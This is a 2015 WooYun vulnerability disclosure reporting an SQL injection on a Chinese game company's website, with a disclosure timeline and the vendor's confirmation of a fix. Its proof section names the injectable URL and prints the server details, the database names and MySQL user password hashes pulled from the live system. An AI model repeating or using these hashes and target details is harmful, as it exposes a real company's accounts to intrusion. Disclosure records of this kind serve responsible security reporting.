漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-091867
漏洞标题:北京展程科技有限公司旗下暴打魏蜀吴官网存在SQL注入
相关厂商:zhanchenggame.com
漏洞作者: 聋子
提交时间:2015-02-05 18:25
修复时间:2015-03-22 18:26
公开时间:2015-03-22 18:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-05: 细节已通知厂商并且等待厂商处理中
2015-02-05: 厂商已经确认,细节仅向厂商公开
2015-02-15: 细节向核心白帽子及相关领域专家公开
2015-02-25: 细节向普通白帽子公开
2015-03-07: 细节向实习白帽子公开
2015-03-22: 细节向公众公开
简要描述:
好厉害的注入。。。
详细说明:
注出了不少东西呢
漏洞证明:
Target: http://bdwsw.zhanchenggame.com/index.php?c=news&m=get_news_by_id&id=534
Host IP: 42.62.40.62
Web Server: nginx/1.2.2
Powered-by: PHP/5.4.5
DB Server: MySQL >=5
Resp. Time(avg): 1601 ms
Current User: admin@10.6.10.100
Sql Version: 5.5.24-ucloudrel1-log
Current DB: zc_bdwsw_website
System User: admin@10.6.10.100
Host Name: Ucloud-udbcluster
Installation dir: /opt/udb/program/mysql/mysql-5.5.24
DB User & Pass: ucloudbackup:*323D60A7122AF5FD4A819A6101D5DB1278240880:%
root:*A275D1AB8003C351E06D07C726E6908CD0C6B417:%
admin:*73B0E3B692AEAE1FEEC12145775F56D6989766A0:%
zctech_ops:*9C8C76E7AD79B122EB6A4641E46CF1F09DAD0BFC:%
Data Bases: information_schema
mysql
performance_schema
test
zc_bbs_bdwsw
zc_bbs_dota
zc_bbs_yjjc
zc_bbs_zctechqd
zc_bdwsw_website
zc_dota_website
zc_yjjc_website
修复方案:
好好过滤一下吧
版权声明:转载请注明来源 聋子@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-02-05 19:02
厂商回复:
感谢举报漏洞,漏洞已修复
最新状态:
暂无